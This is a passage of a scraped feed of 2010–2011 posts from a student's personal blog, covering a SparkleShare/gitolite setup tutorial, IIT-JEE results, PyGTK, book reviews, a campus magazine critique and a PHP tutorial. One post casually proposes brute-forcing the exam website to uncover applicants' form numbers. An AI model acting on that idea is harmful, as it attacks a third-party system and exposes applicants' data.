Sparkleshare Server using Gitolite and Ubuntu","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2011\u002F06\u002F20\u002Fubuntu-gitolite-sparkleshare-install\u002F","2011-06-20T00:00:00.000Z","Introduction\nEverybody seems to be all about open-source cloud-backup and sync solutions nowadays. The hype is all around the cloud, they say. However, the cloud is just a stupid concept for salespeople, one that I prefer to avoid. Still, people are coming up with all kinds of crazy ideas to create their own Dropbox clones.
A few similar services include SpiderOak, Ubuntu One, SugarSync, and Wuala. However, not all of them are compatible with Linux (unlike Dropbox, which is).\nComparison\nSo here’s a minor comparison of some famous clients:\nDropbox : Current leader; offers everything from sync, collaboration, sharing, public links and upgradable storage, and is the de-facto client for synchronization tasks. However, there have been a few issues regarding its privacy recently.\nUbuntu One : Ubuntu One is Ubuntu’s answer to Dropbox. It’s excellent, with an open-source API that allows one to create applications for the Ubuntu One platform very easily. However, the server side of Ubuntu One is still closed source, which means you cannot set it up on your own servers (similar to Dropbox). Canonical has hinted that it might be made open source in the future.\nWuala : is a file-backup network where you trade your own hard disk space for extra storage. This allows Wuala to offer more space at a much lower price.\nSpiderOak : I’m using this currently, along with SparkleShare and Dropbox. It has proven to be very robust, allowing me to back up almost anything to its servers. I’ve got a 5GB account, which is more than enough for me till now. Its very powerful interface allows one to control each and every aspect of the backup\u002Fsync\u002Fshare process. Also, it boasts of a true-privacy feature, meaning that all your documents are encrypted before being sent to its servers. It also means that you can only reset your password from your own computer.\nTake a look at http:\u002F\u002Fen.wikipedia.org\u002Fwiki\u002FComparison_of_file_synchronization_software for a better comparison of several other services as well.\nInstalling SparkleShare using gitolite\nThis is a simple tutorial on running your own SparkleShare hosting server. Note that this implementation should ideally be built as a separate module for sparkleshare-admin, which is still in the works as of writing. SparkleShare’s basic concept is to use git repositories as storage places. In case you don’t know what git is, I’d recommend this guide for more details. In short, it is an awesome revision-control system for use by anyone managing code (or content, for that matter). It allows you to keep track of what is happening with your directory, and revert back to earlier versions (among several other things).\nSparkleShare asks you to set up a git server somewhere and use it as a remote storage system. It offers out-of-the-box support for the git hosting providers GitHub and Gitorious. It also allows you to add your own custom servers. Enough description, let’s get down to some work:\nSetup Gitolite\nAssumptions:\nYou are running a stable Linux OS (Fedora\u002FDebian\u002FUbuntu etc.)\nuser@host1 is your own computer\nuser2@host2 is the primary computer where you intend to start the server\nThe gitolite username is sparkle\nSetup WildRepos\nNow we need a method to allow anyone to create git repositories on the server. This is accomplished via Gitolite’s very powerful Wildcard Repositories feature. Edit the gitolite config file and add the following lines at the bottom:
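(The exact lines did not survive feed syndication; below is a minimal reconstructed sketch using gitolite’s documented wildrepos syntax. It assumes repositories are created under the creator’s own username and that gitolite’s default WRITERS\u002FREADERS roles are in use.)\n\nrepo CREATOR\u002F[a-zA-Z0-9].*\n    C   = @all\n    RW+ = CREATOR\n    RW  = WRITERS\n    R   = READERS\n\nThe C rule is what lets any user create a repository matching the pattern; CREATOR expands to whoever first pushes the repo.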
Setup Client\nNow, your server is all set up, but there is still stuff to be done:\nWhen you run SparkleShare for the first time, it asks you for a few things, including your email id. Fill in those details, but do not set up your repository yet. You need to first allow your SparkleShare account access to gitolite.\nNow, if all goes well, you’d have allowed access to gitolite for this user. We now need to re-run the SparkleShare setup. Find it in your Applications. Now, when it asks you to fill in a repository path, type in the following details:\nPlease take care of the slashes, otherwise SparkleShare fails to recognize it as a valid ssh address. Instead of fh73ah, you can type any alphanumeric string of 6 characters. You can change this in your gitolite-admin conf.\nAfter your first sync is complete (in which it tries to clone your existing repo, and gitolite creates it for you), you can find a folder called Sparkleshare in your home directory. This contains all your personal sparkleshares, including your first one. Put any content inside the fh73ah folder and it will be automatically synchronized.\nConclusion\nThe best thing about SparkleShare is that you can use your own server under your own rules. I’ve synced 143GB via SparkleShare, and it has been working excellently so far. It keeps a complete history, takes care of moves (git) and allows you to keep huge backups easily. Just drag and drop, and forget. If you want to sync already-existing folders, just drag them, and alt+drop them inside the shared folder. This way a symlink gets created, which refers to the original directory. The SparkleShare folder on my computer takes up hardly a few KBs, but syncs 150GB worth of content.\nThis method is only useful if you need to manage multiple accounts on the same host. Otherwise, you can refer to this excellent post on webupd8 for instructions to install it on a single-user system (which does not involve the complication of gitolite). I’ve been looking for some gitolite management scripts (I’ve written a few as well) which would allow one to easily add their own ssh keys. This way anyone can easily set up accounts on the system. However, as of now, this is just a dream.",[],{"slug":3165,"title":3166,"link":3167,"pubDate":3168,"contentSnippet":3169,"tags":3170,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"new-website-captnemo-in","New Website [ CaptNemo.in]","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2011\u002F06\u002F13\u002Fnew-website-captnemo-in\u002F","2011-06-13T00:00:00.000Z","Just if someone's still following this blog around (don't, it's already dead).\nI've moved over to my new website (http:\u002F\u002Fwww.captnemo.in). It's running from GitHub and will be a perfectly static website where the power of my awesome magical skills shall finally be revealed.\nJust joking. It's hosted on the awesome servers of GitHub and you might want to check it out.",[],{"slug":3172,"title":3173,"link":3174,"pubDate":3175,"contentSnippet":3176,"tags":3177,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"iit-jee","IIT-JEE 2011 Results","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2011\u002F06\u002F01\u002Fiit-jee\u002F","2011-06-01T00:00:00.000Z","I worked out the entire IIT-JEE 2011 results and the end result is available here. I’ve intentionally removed the Application Form Number (partially) in the results, so that it may not be misused. I’m thinking of trying a full-scale birthday permutation attempt on the JEE site for the Application Form. What do you think?
Will it be worth it?",[],{"slug":3179,"title":3180,"link":3181,"pubDate":3182,"contentSnippet":3183,"tags":3184,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"learning-python","Learning Python, PyGTK","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2011\u002F05\u002F16\u002Flearning-python\u002F","2011-05-16T00:00:00.000Z","I had been meaning to learn either Python or Ruby for a long time but had been unable to decide. I had a basic understanding of both of these, but I never had the chance to build an entire application in either. And I’m not talking about using Django or Ruby on Rails (which are both brilliant), but building a desktop application using GTK.\nThe application I was first aiming for was a P2P sharing client which would be completely decentralized and offer several special features, such as:\nNAT Traversal using UDP Hole Punching\nHTTP-based file sharing as well (so that people can install their clients, and still use IDM for downloading stuff)\nClient discovery & routing behind firewalls along the lines of Skype (using supernodes)\nHowever, my dreams were shattered by the first point itself, that being the difficulty of NAT Traversal. Further ahead was the question of networking as well, which could have potentially driven me nuts. I worked a bit on it, using STUN and twisted, but gave up on it soon as being unfeasible as a learning project.\nThe next idea came to me when I got tired of downloading stuff using axel from the command line and started itching for something similar to Internet Download Manager for Ubuntu. The closest thing to a download manager on Ubuntu is FatRat, and it is something I really don’t like. It is based on Qt and prides itself on working as a front-end for several file-sharing websites as well. What I needed was in fact a fast download manager, which keeps track of what I download, and does not require keeping a terminal open all the time.\nI found GwGet, which occasionally looks much better in the source version than in the one from the Ubuntu repositories. I really liked this one, except for the fact that it was made using C++, and used single-threaded downloads (like wget). As a result it was quite slow, and not up to my needs.\nThat was when I thought of the idea of creating a download manager using GTK + Python\u002FRuby. I looked around for axel ports in Python\u002FRuby and found PyAxel, which beat axel in some of my benchmarks (after this patch). For the past two days, I have been working with PyGTK, Glade, Anjuta and several other IDEs, none of them to my liking. I really prefer Vim :)\nSo far, the work on PGet has been minimal. I’ve worked out threading, and little parts of the GUI which were stripped from GwGet. As of now, it is still in the works, but I am hoping for a release real soon. After all, it is not for nothing that they call Python a dynamic language.
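To give a flavour of the threading part (a rough sketch, not PGet’s actual code; it assumes PyGTK2 with gobject, and fakes the download with a sleep):\n\nimport threading\nimport time\n\nimport gobject\nimport gtk\n\ngobject.threads_init()  # let GTK play nicely with Python threads\n\ndef download(label):\n    time.sleep(2)  # stand-in for the real, segmented download\n    # widgets must only be touched from the main loop, so queue the update\n    gobject.idle_add(label.set_text, 'download finished')\n\nwin = gtk.Window()\nwin.connect('destroy', gtk.main_quit)\nlabel = gtk.Label('downloading...')\nwin.add(label)\nwin.show_all()\n\nthreading.Thread(target=download, args=(label,)).start()\ngtk.main()\n\nThe idea is simply that worker threads never touch the GUI directly; they hand updates to the main loop via gobject.idle_add.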
For more details, please go to the PGet project page on GitHub. I will be posting further updates over there.\nIn case someone is following this blog, you can view the source for this website at GitHub and maybe even fork it!",[],{"slug":3186,"title":3187,"link":3188,"pubDate":3189,"contentSnippet":3190,"tags":3191,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"puzzles","Puzzles, Life & Other Things","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2011\u002F04\u002F30\u002Fpuzzles\u002F","2011-04-30T00:00:00.000Z","Since I’ve already decided to make this my newer blog, why not just continue in the same spirit and write a little about the events of my highly boring, lazy life. For one, I was part of the SDSLabs 1st yearly trip to Robber’s Caves, which was highly enthralling. We enjoyed a lot, and as a bonus I learned to play Mafia. Somehow the concept of not-knowing and yet trying to deduce a solution in Mafia seems quite interesting for a party game to me. Among other things, my sister got me a new Rubik’s Cube (which should be my 6th or 7th, I guess), and I’ve been practising quite a lot (to the dismay of my friends and teachers). My timings have not been up to the mark they were at last year, but I’ve been improving, and I average around 80 seconds per solve. I’ve been focusing on learning the entire Fridrich method, and try to learn 2-3 moves per day.\nI also spent some time reading a brilliant new fantasy series called “The Kingkiller Chronicles” by Patrick Rothfuss. It is a brilliant debut series in fantasy fiction, and already has 2 books out from its planned trilogy: The Name of the Wind, and The Wise Man’s Fear. The series is highly praised, and if you were to believe me, one of the best pieces of fantasy ever written. But it is not the fantasy in this book that makes it so great. It’s the general themes of love, tragedy, enmity, and knowledge that make it brilliant. Kvothe, the protagonist of the series, is a charming character who is telling the story of his life to the Chronicler. Enough on the book, just go ahead and read it!\nOh, and I’ve got an RSS feed for the blog using Jekyll already. It’s available at \u002Fatom.xml",[],{"slug":3193,"title":3194,"link":3195,"pubDate":3196,"contentSnippet":3197,"tags":3198,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"game-of-thrones","Game Of Thrones","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2011\u002F04\u002F19\u002Fgame-of-thrones\u002F","2011-04-19T00:00:00.000Z","For the uninitiated, Game Of Thrones is a high-budget fantasy TV series currently being screened on HBO. It is based on A Game of Thrones, book one of George R.R. Martin’s epic fantasy series, A Song of Ice & Fire.\nI had started reading the book a few weeks ago (not knowing then about the TV series), but never quite got the time. However, after the highly promoted trailer, and the absolutely brilliant episode 1, I’ve picked up the book once again.\nI’ve decided to keep myself aloof from all the spoilers, and read the book along with the series. This means that I will be finishing the book in a very long time, but also that I will be able to get a much better insight into what is going on in the series. For example, there are very many characters in the TV series which are not yet properly introduced, and it was interesting to see them come upfront in the book.\nIs anyone else reading the book for the first time along with the TV series?\nBelow is the ground that each episode covers from the book.
I will continue to update this as the series goes ahead:\nEpisode 1: Chapters 1-8\nEpisode 2: Chapters 9-17\nEpisode 3: Chapters 18-24*\nEpisode 4: Chapters 25-29\nEpisode 5: Chapters 30-35\n* Only half of the chapter is present in the respective episode.\nLet me know what you think of Game Of Thrones in the comments…",[],{"slug":3200,"title":3201,"link":3202,"pubDate":3203,"contentSnippet":3204,"tags":3205,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"introduction","Introduction","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2011\u002F04\u002F10\u002Fintroduction\u002F","2011-04-10T00:00:00.000Z","Welcome to my GitHub pages. This will be my personal code blog site, or something of that sort. I will soon be transitioning this site to Jekyll for easier publishing and maybe move away from WordPress. (Done)\nI am a proficient coder in PHP, working on various internal projects at SDSLabs.\nHere is my current setup:\nDell Inspiron 1545\nT-6400 Intel Core 2 Duo\nUbuntu Oneiric Ocelot 11.10 (Default Primary OS)\nElementary OS (under testing); will be moving to GNOME Shell soon\nSamurai WTF, Backtrack 5 for pen-tests\nMoved from Windows after remaining a staunch supporter for 5 years",[],{"slug":3207,"title":3208,"link":3209,"pubDate":3210,"contentSnippet":3211,"tags":3212,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"run-apt-add-repo-behind-firewall","How to run apt-add-repository behind firewalls (#iitr)","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2011\u002F04\u002F01\u002Frun-apt-add-repo-behind-firewall\u002F","2011-04-01T00:00:00.000Z","Copied from OMGUbuntu\nPress Alt-F2 and type “gksu gedit \u002Fusr\u002Flib\u002Fpython2.6\u002Fdist-packages\u002Fsoftwareproperties\u002Fppa.py”\nFind line 88, change “keyserver.ubuntu.com” to “hkp:\u002F\u002Fkeyserver.ubuntu.com:80”\nSave and close\nNote that this is the default setting in Ubuntu Natty Narwhal (11.04), and was only applicable for Maverick or older versions.
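(An aside that is not part of the original post: the same edit can be scripted. An untested one-liner sketch, using the same file path and hostnames as above; sed -i edits the file in place, so back it up first:)\n\nsudo sed -i 's|keyserver.ubuntu.com|hkp:\u002F\u002Fkeyserver.ubuntu.com:80|' \u002Fusr\u002Flib\u002Fpython2.6\u002Fdist-packages\u002Fsoftwareproperties\u002Fppa.py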
",[],{"slug":3214,"title":3215,"link":3216,"pubDate":3217,"contentSnippet":3218,"tags":3219,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"wona-review","Wona Oct-Dec '10 Review","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2011\u002F03\u002F17\u002Fwona-review\u002F","2011-03-17T00:00:00.000Z","Download the issue on the WONA archive website.\n\nNote about Archival: This post used to live on the (now-dead) piratecoders.co.cc website. I’ve moved it here for archival’s sake.\nThe latest issue of WONA turned up 3 months late at my doorstep. Other than the fact that it was missing an apology letter for this lateness, it was a good step in the forward direction by WONA in general. Once you take aside the pleasantries, and the sarcasm, I felt that WONA was, on a general scale, surpassing what it had been doing till now, and moving towards a better (and hopefully a quicker) issue. However, this one was definitely not the one to be labelled perfect. So here comes the review:\nCover : Let’s start with the cover. Not much to write about it, other than the fact that it took me quite some time to figure out what Maradona was doing on it. Nice work in putting up the WONA logo (which I’m genuinely fond of). Nice choice of color scheme, and overall good work.\nEditorial : The magazine starts on a good note with the editorial promising us what’s inside in a nutshell. This was the best write-up of the issue for me, and did its job well. I was enticed into reading further, and got a gist of what was about to come.\nAlmost Famous : Almost Famous has quite a history of its own, and is one column that every person who lays his hands on WONA definitely reads. This time around, you held out Jan Flaming for me. As for the interview itself, it was clearly written, had some nice questions, some imaginary answers, and overall does quite well for the reader. On a second take, this was probably the reason it ends up on the first page this time.\nMurphy’s Strip : Alas, if Murphy had been here, he might have taken a shot or two at you. How about: “Any comic that can go wrong will go wrong.” Or maybe “If Vela could draw stupid sketches, he would.” Still, nice concept, bad execution. Could have been better, definitely, especially with regards to the sketching. Still 42 times better than the other strip.\nNewsNotes : were 4 pages of news, which arrived 3 months too late. Nobody remembers any of these incidents happening, let alone being part of them. PAN-IIT was way bigger than your coverage, and deserved a bit more. The rest of the newsnotes were, in short, exactly what they were supposed to be: news, without any sarcasm or humour. However, I’m heavily against the use of one and a half pages to glorify medal lists. I know how costly it is to push each page into the magazine, but please don’t fill it with something that no one bothers to read. Medal winners, please don’t mind, but the two tables were a waste of space, if not something else. Or else the nine people from WONA’s news section could not find enough news. Anyone could have gotten these lists from the Sports Council a day after the event ceremonies. Give me something better.\nFace-Off : was usual stuff. Nice choice of topic, nicely edited, with some actual points being thrown around, this turned out fine.\nBig Story (Devil Wears Prada) : In spite of my initial skepticism about the story (I knew about it before the issue came out), I really liked it. This article goes ahead and proves that what you write on is unimportant (or at least less so) as long as you write it well. In a world of geeks, bringing out a cover story on fashion is really a bold move, and I must applaud you for having the guts to do so. The article was well written, and a joy to read. However, I’d come to hear, from several sources, that people quoted in the article did not in fact give one to WONA. Please take care not to make up stuff next time. You’re a news mag, stick to the status quo, please.\nVerbatim : WONA gets its hands on the most respected professor on our campus, and does quite a good job of it as well. Nice questions and interesting answers make up a good read. In fact, the only negative point of the article was its placement.\nWonaLeaks : This was the article that forced me to write this review. If it was an attempt at humour, it failed badly. As an attempt to mix news and wonaspeek, it fails even worse. Mixing kangaroos, the Indian cricket team, koala bears and a state prosecutor is definitely not the recipe for success. It might work in movies (Spaceman + Potato Head + Zombie Dolls + Cowboy + Alien with 3 eyes = Oscar), but definitely not on paper. Nobody remembers the event the article talks about. Its relation to WikiLeaks is not enough to demand a WonaLeaks icon. I shall forever remember this as the worst piece of writing, and imagination, that ever came out of WONA.\nTech-ila Shots : The in-house tech article arrives a few months late. (Google just released the Cr-48).
I would have personally liked to see something else here (iPhone vs Android, iPhone 5, Ubuntu vs Windows etc.). But as it was, the article was well thought out, and did exactly what it planned to. It could have done with a bit of pruning though, and the author might have liked to tell us a bit more about the OS itself (it only mentions the fact that it’s web-based, comes pre-installed, and will not run intensive applications).\nRandom Ed : I’m not sure if it really is an editorial, but I’ll stick with the title. Nicely written, in short. However, the purpose and intent of such an article is lost in the truly random nature of the article itself. The article fails to reach a resolution, and delivers nothing at all. Indeed, most of the thoughts mentioned in the article must have sprung to every person’s brain at some time or another. Then what’s the need of this article? Is it philosophy that Wona’s trying to dive into? Or perhaps it’s just a conspiracy to get all students in the campus to think more randomly, leading to a decrease in the entropy of the thoughts of the profs, and as a consequence, simpler question papers. (For the skeptics, something similar has already happened, and our thought patterns are involved in the entropy of a system.)\nEthics : was actually the cover story (which one comes to know only after re-reading the cover). The author is unclear of the intent of the article, and it steers in various directions. I’m still unsure as to where it ends, and whether Arasu’s mumblings (Another Brick in the Wall) are part of it. One might raise a question as to the relevance of the last section itself, but this article had its moments as well. In short, nice concept, nice writing, but it could have done with a bit of restructuring.\nCanine Strip : Another page wasted. The time spent by the sketcher could so easily have been devoted to bettering the other one. Needless to say, WONA seems to be lacking in people who actually write, and it results in a page filled with a stupid comic about dogs taking over the campus. Seriously, get some creativity. Even zombies would have done better.\nWORC : Good decision in continuing this column. I was afraid it might get scrapped along with Agony Aunt (which was a very good decision). I can just hope that you actually asked some people to create those pie charts. Dr. Sinhval seems to have taken his time in answering the questions, and his reply is full of facts, explanations, and ideas. Nice work by the ed team here, definitely.\nOther than the articles, there are a few more areas of interest I would like to point out.\nDesign : Seriously, have you people ever heard of vector graphics? Your designers really need a course on making scalable graphics. The need for Darth Vader to illustrate an article is fine, as long as you have a big enough image to fit. Trying to scale a 400×300 JPG into a page will not do. Even the Cafe de Norma ad was pixellated. The girl wearing Prada proves that it was possible to print clearer graphics. However, on the very next page, there’s an overdose of black. Similarly pixellated were most of the other pics in the mag. The 3 monkeys illustrating the second-last page could have been something better.
The essence of the German flag was lost in black & white (Almost Famous). And just so you know that everyone noticed, dark-colored pics in the background make text unreadable (Chrome OS).\nAds : I don’t know the reasons behind it, but from a reader’s point of view, an issue with only 3 ads is really awesome. Especially once you compare it with Kshitiz’s latest issue. I know it must have been really hard to cover the costs, and manage the finances and all that. But folks over here are smiling for your hard work. You finally published it (albeit 3 months late), and that’s what matters.\nPlacement : could have been better. Some articles should have gotten more coverage than they were given. Perhaps you should think of making Tech-ila bigger. I wouldn’t have minded in the least if Verbatim had gotten a bit larger. The ethics article was divided into portions I couldn’t understand, and might have done with fewer sections.\nCover : A little side note as to why the article’s title changes from the cover to the article itself. Isn’t the cover supposed to hold the titles as well? On second thoughts, I might be wrong to second-guess your current layout, but can you just put up page numbers! They would surely help.\nAnd finally, a note from my side: WONA is an excellent magazine. Despite it having a status quo of its own on its supposed unreadability without an excellent understanding of WONA’s inner sanctum, I believe that the magazine is an essential part of life at IITR. It is one of the few sections in our campus whose work is actually a part of our daily life. Thanks to the entire team for working so hard on this issue.\nThis review is my way of letting you know that there are people who care about what you write. There are people who wait for the issue, and who are determined to do so till they pass out. Consider it a friendly nudge and a little feedback from my side. It’s up to you to decide what your mag is, after all. With hopes that the next issue is even better than this one.\nUpdate: Friends over at WONA inform me that the delay in the mag was due to an issue on the administration’s side rather than WONA’s side. If that was the case, the blame’s partially on your staff advisors (spelled incorrectly on the mag’s first page): Dr. M.J. Nigam, and Dr. B.R. Gurjar. I’m still not entirely sympathetic to the excuse given, and believe that it might have come out a bit sooner with some more effort on WONA’s side.",[],{"slug":3221,"title":3222,"link":3223,"pubDate":3224,"contentSnippet":3225,"tags":3226,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"what-the-hell-is-this","Random Stray Thoughts","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2010\u002F05\u002F25\u002Fwhat-the-hell-is-this\u002F","2010-05-25T00:00:00.000Z","[Editor’s note: I found this scrawled across an A4 sheet in a classroom. The author drifts off way too much from his thinking to make any sense, but there were some things that I really liked. So I present them to you, unedited: the random, unexplainable thoughts of a genius. My comments are in brackets]\nSometimes you are just destined to be where you are. You may try to veer off course, try to change it. But the end remains the same.\nYou.Here.Now\nThe forces of Destiny seem too powerful to be stopped by you. So you keep on flowing. Further & further away.\nAnd time moves on\nAnd it’s Now already.\nLooking back at the choices you made, the crossroads you stood at.
The coincidences, accidents pile up and as you remember them you think - would you have chosen otherwise?\nBut regardless of your answer you’d still be here, Now.\nAnd it’s only left to deal with the Now.\n[Note: Now the author takes a swipe at history. lol]\nEver since mankind learned to reason, the challenge had always been to tackle the Now. For tomorrow was forever being planned, partly in our own dreams, and partly in the garden of Destiny\nAs for the Past, it was just a multitude of feelings, a vault to choose from - happy, sad, heartbreaking, exciting memories, remembrances, last words. The Past always walks beside us - sometimes haunting, crippling us down, and at times uplifting, encouraging, & maybe even expecting.\nAnd so the challenge remains the Now. What do you do with it? Go ahead and battle it head on - as you’ve been asked to, regardless of the consequences?\nFor herein lies the path to greatness, they say - Keep Fighting. But is it the only path?\n[Note: Here on, the author seems to get drifted far too much in his own thoughts, and does not care to explain very much. As a result much of the following is pretty self-contradictory, and maybe even rubbish]\nWhat if there is another road. A road much less taken, as Frost said. A road you know nothing about.\nWhat if the present is not a choice? What if it is just a sequence of events to be played out from someone’s memories, where you just play your part, and in spite of what road you choose, you end up where you must.\nSo you fight. And think. And fight with the Present [As if the present is a monster, you fool], believing that the Future can be changed, that it can be manipulated, morphed into someone’s likeness.\nYour head starts to pound with the effort. You decide to stop thinking. [Ahh. Finally, I was wondering how long I would have to keep up]\nIt’s clearing your head.\nThen you look around you. [Reality, anyone?]\nThe Present closes in [Not again!!] You realize it’s not there to be defeated, or to win either.\nIt just is.\nJust as you are.\nAnd you close your eyes again.\nYou start to think.\n[I like the ending]",[],{"slug":3228,"title":3229,"link":3230,"pubDate":3231,"contentSnippet":3232,"tags":3233,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"worries-css-template","Worries Css Template","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2010\u002F04\u002F15\u002Fworries-css-template\u002F","2010-04-15T00:00:00.000Z","Finally, I’ve gone from being a complete programmer to a designer as well, one who can create a CSS template using Paint.NET. Photoshop is way too outlandish for me, you see. It wasn't easy, but it was definitely fun. The template was based on a wallpaper by http:\u002F\u002Fleon-gao.deviantart.com. The final template is still unnamed. Hope you all like it; there is a demo available at http:\u002F\u002Fnemo.criitique.in\u002Fworries. [Image: Worries Template]",[],{"slug":3235,"title":3236,"link":3237,"pubDate":3238,"contentSnippet":3239,"tags":3240,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"whats-sailing","What's Sailing","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2010\u002F03\u002F23\u002Fwhats-sailing\u002F","2010-03-23T00:00:00.000Z","Aboard The Nautilus, that is\nI finally decided to write a blog post for my non-geek friends, with affiliations ranging from DPs to BPs and the oblivious to all, but the elite few, GPs (Keep thinking, non_IITians).
In the midst of all the chapos and ghissai (not me, of course), Nautilus has been, and will remain, a lonely submarine beneath the ocean. And this has been the way for me in the past month. After a hefty piece of time where we were attacked by the mighty INS Cognizance (actually, it was a retaliation attack because, you see, Nautilus had won an event of theirs, a treasure hunt, and the mighty Cognizance and the event organizers deemed the methods of my winning to be dishonest. I had my reasons). But after that a hefty war at the seas resumed. I had the luxury to dip underneath and avoid everything, once in a while. But rumours surrounded me, and I started to hear all sorts of things about me. And that is when the drama settled once and for all. (It ended with a 5k fine, if you need to know.)\nINS Cognizance is on its way to the end of its journey (join it @ www.cognizance.org.in, 26-30 Mar, IITR). However, I shall be busy participating somewhere else, Chaos ‘10, India’s largest gaming extravaganza. I have assured INS Cognizance that Nautilus shall no longer be troubling them, but who knows, with such waters, a collision may be unavoidable in the near future. And when that happens, I’m taking my warheads with me, just in case.\nIn other news, I have been working on a couple of my own ideas, such as SMAC-I (Search Music Across Channel I), a Video Portal for the Cinematography Section, IITRAANA.org, Counter-Strike servers, and the Intra Bhawan Gaming Tourney (which we won easily enough in AoE, NFS, as well as CS). Congrats to my clan mates. The net connectivity has been terrible here, and I’ve been derailed a few times along my route to Gmail. Oh, and I won the second prize in Srishti’s dynamic website design event, for LION - my Twitter clone. I may or may not launch it, because, you see, it’s just another clone. I also put up a new design for Criitique.in. Please check it out, and comment. I also posted a lot of pics and designs on Kriti, the DeviantArt clone for IITR. Check them as well.\nFor those outside IITR, the link for my web presence is http:\u002F\u002Fnemo.criitique.in.\nHere are some final few words in parting to all my frnds @ IITR\n@[Ex!$TeN$n3] - gl hf, gg :)\nAnd special thanks to Dr. Lecter and General Hendrix for making the legend of Capt. Nemo a reality. If you ever need assistance in a cross-Atlantic trip, let me know. I may ship you till Atlantis, after which you are responsible for yourself and your belongings :)",[],{"slug":3242,"title":3243,"link":3244,"pubDate":3245,"contentSnippet":3246,"tags":3247,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"learning-phpmysql-part-1","Learning PHP\u002FmySQL Part 1","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2010\u002F02\u002F20\u002Flearning-phpmysql-part-1\u002F","2010-02-20T00:00:00.000Z","Over the past 2 months, I’ve been learning PHP\u002FmySQL, and it is a great combination. After helping out a lot of people, I’ve decided to write a tutorial on using PHP\u002FmySQL to create a cool website. For the entire duration of this tutorial, this is the list of software we will be working with:\nXAMPP Server Lite version (to get Apache & mySQL)\nDreamweaver CS4 (for template support). Alternatively use Microsoft Expression Web 3.\nNotepad++ (it’s a cool editor)\nPHP Manual (download the full HTML version)\nThe website we will be developing is called Artemis Fowl Files (AFF for short).
It is a small website with several features that we shall develop over the length of the tutorial.\nInstalling PHP & mySQL using XAMPP\nPHP is a server-side scripting language, which means that PHP is run on the web server itself. For example, any PHP script running at Google.com will remain on the server, and not reach you (the client). By contrast, JavaScript runs on the client side, i.e. any JS code must be transmitted to the client before being executed.\nThis is how a basic PHP script actually runs:\nPHP source file –> PHP Parser (running on the web server) –> Becomes an HTML file –> HTML file sent to client\nWhich means that the PHP source file is run on the server, which converts the file to a pre-calculated HTML file, which is then sent to the client. Let’s write some basic PHP code.\n\n\u003CHTML>\n\u003CHEAD>\u003CTITLE>Sample PHP File\u003C\u002FTITLE>\u003C\u002FHEAD>\n\u003CBODY>\n\u003C?php\necho \"This is a sample PHP File\";\n?>\n\u003C\u002FBODY>\n\u003C\u002FHTML>\n\n\nThe basic rule of PHP is that the only code that is considered PHP is that covered between \u003C?php and ?> tags. Anything outside these is ignored and remains the same (i.e. it is not run on the server). The echo command sends the text string to the HTML file. All this means that the file received by the client will look like this:\n\n\u003CHTML>\u003CHEAD>\u003CTITLE>Sample PHP File\u003C\u002FTITLE>\u003C\u002FHEAD>\n\u003CBODY>\nThis is a sample PHP File\n\u003C\u002FBODY>\n\u003C\u002FHTML>\n\n\nThis is what you will get if you run the script on a test server. But before doing that we must install XAMPP, and do some basic setup stuff.\nDownload and extract XAMPPlite.exe anywhere on your computer. Go to where you installed it and run setup_xampp.bat. This will automatically start the Apache server and the mySQL server by default. Also try tinkering with XAMPP-Control and see what runs it.\nNow open your web browser (Firefox\u002FChrome is preferred) and open http:\u002F\u002F127.0.0.1. This IP address is a loopback IP address and always refers to this computer itself (yours). Now you should see a XAMPP splash screen. Go ahead and explore. As of now, what you’ve achieved is this: installed Apache and the mySQL server. Now we need to change the settings for mySQL. Open http:\u002F\u002F127.0.0.1\u002Fsecurity\u002Fxamppsecurity.php and change the mySQL root password (it’s blank by default). Also set a password on the xampp directory, so that others can’t access these settings. Remember the mySQL root password, for it will be useful later on.\nNow comes the part where we actually sit down to write some code. We will be developing the mySQL parts in the next segment. However, we still need to do some other little things before we reach that part.\nCreating The Dreamweaver Template\nNow, call me lazy, but I don’t like designing themes and CSS for my websites. I usually use a free one. And for the rest of this tutorial, I assume you will do the same. We need to create a Dreamweaver website using a readymade CSS template. To get a template, head on to http:\u002F\u002Fwww.freecsstemplates.org. I chose this template. Feel free to choose anything. It does not really matter which, but take care not to download a three-column template, because what we will be developing is quite basic.\nCreate a directory called artemis inside the htdocs folder (found inside xampp).
Extract the CSS template files to the artemis folder such that the index.html file is inside htdocs\\artemis. Now head to your browser and open http:\u002F\u002F127.0.0.1\u002Fartemis.\nIf all went well, you should now see the template theme. Now we must convert this CSS template into a Dreamweaver template. Open the index.html file in Dreamweaver. We have to mark certain areas, the ones we intend to edit in each document, as editable. For instance, the top header in each document must remain the same and would not be editable. But the sidebar content may need to change as per each page on our site. Taking this further, the footer will be the same for each page. To create an editable region, just select a sample text from the main text (the one that looks like the blog entry) and right-click -> Templates -> Create Editable Region.\nDreamweaver will give a warning that the current document will be converted to a template. That is what we want. Give a name to the region (let’s call it ‘main’). Now delete everything other than this main region from the right column (i.e. the blog-entry column). You may need to switch to the split view to cleanly delete the HTML markup.\nSimilarly, create another editable region for the sidebar. Remember to delete everything else in the 